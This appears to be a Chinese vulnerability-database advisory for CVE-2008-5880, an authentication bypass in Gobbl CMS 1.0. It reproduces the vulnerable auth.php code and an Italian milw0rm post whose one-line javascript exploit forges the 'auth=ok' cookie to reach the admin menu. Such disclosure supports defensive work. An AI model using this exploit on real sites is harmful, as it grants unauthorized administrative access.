Gobbl CMS Cookie 脚本auth.php 身份认证绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117078 漏洞类型 授权问题
发布时间 2008-12-18 更新时间 2009-01-29
CVE编号 CVE-2008-5880 CNNVD-ID CNNVD-200901-085
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7518
https://cxsecurity.com/issue/WLB-2009010141
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-085
|漏洞详情
GobblCMS是一款内容管理系统。GobblCMS1.0版本中的admin/auth.php允许远程攻击者通过把authcookie设置成"ok",来绕过身份认证和获得管理访问权限。
|漏洞EXP
---------------------------
Gobbl Cms 1.0 I.Cookie Hand.
---------------------------
Autore: x0r ( Evolution Team)
Email: andry2000@hotmail.it
Demo Site:http://www.gobbl.net/
---------------------------
 
Bug In: \admin\auth.php  
 
?>
include ('../config.php');
 
$user = $_POST['user'];
$pass = $_POST['pass'];
 
if ( ($user == $un) and ($pass == $pw) )
{
setcookie( "auth", "ok", time()+40000 ); # Bugz
header ( "location:add.php" ); exit ();
}
else
{
header ( "location:index.php" ); exit ();
}
?>
 
Il file auth.php controlla se nel file ../config.php le post $user\$pass presentano gli stessi dati delle variabili
$un\$pw ( config.php ) se così è setta il cookie auth=ok :P ^ ^
 
Exploit:  
 
javascript:document.cookie = "auth=ok; path=/"; then \admin\menu.php # So Easy To Hack :P
 
Greetz: Amore Mio Sei La Mia Stella Che Mi Illumina Qua Giù...Ti AmO

# milw0rm.com [2008-12-18]
|参考资料

来源:BID
名称:32918
链接:http://www.securityfocus.com/bid/32918
来源:MILW0RM
名称:7518
链接:http://www.milw0rm.com/exploits/7518
来源:SREASON
名称:4886
链接:http://securityreason.com/securityalert/4886
来源:SECUNIA
名称:33190
链接:http://secunia.com/advisories/33190